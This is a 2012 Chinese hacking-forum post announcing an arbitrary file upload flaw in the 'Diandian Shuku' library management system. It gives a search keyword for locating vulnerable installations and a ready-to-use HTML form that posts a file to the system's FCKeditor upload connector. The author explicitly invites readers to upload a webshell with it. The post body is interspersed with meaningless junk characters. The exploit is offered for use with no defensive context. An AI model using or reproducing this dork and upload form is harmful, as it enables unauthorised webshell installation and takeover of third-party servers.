找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 7579|回复: 0
打印 上一主题 下一主题

点点书库图书馆系统文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:20:59 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
主题:图书馆系统任意文件上传漏洞
$ u% T  d' F3 y+ o0 S 作者:冰锋刺客
( r) X! V1 L* v, t- @ 厂商:点击书(dianjishu.com)/ ^: c5 z& u; M6 O' \3 I" q. f+ S' h
日期:2012-6-21
' X+ j1 o( r$ C& v
4 H8 D$ \: ~  }5 u; z2 L0 |2 VI 概述
; Y! |" |2 R3 ~' N& o' F  q   点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
% J+ q. L+ X# V& } II 简介' u/ ~! _( G$ l0 h
   关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
1 M) z& S1 d. X- N0 D2 E 补充一个漏洞% r: F6 x& p/ ]* q# Z( f6 g
<form id="frmUpload" enctype="multipart/form-data"
: D5 O% `( X" G& [' X& ?# d action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>! r5 |& z% F$ f  L
<input id="btnUpload" type="submit" value="操翻他">
! F( T/ O( L4 T5 t1 D5 B, ] </form>: W( ~. l7 ^( L8 h& `( f8 `
你们懂的
$ Q* D  E6 f! F1 \" u 那傻逼提供还需要改包.
) X1 v' [+ z8 w& e8 S3 E 自己看了下源代码发现fckeditor, U/ c* a6 x& x) `. Z9 F
直接秒杀
" ~5 g% }* ~: x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表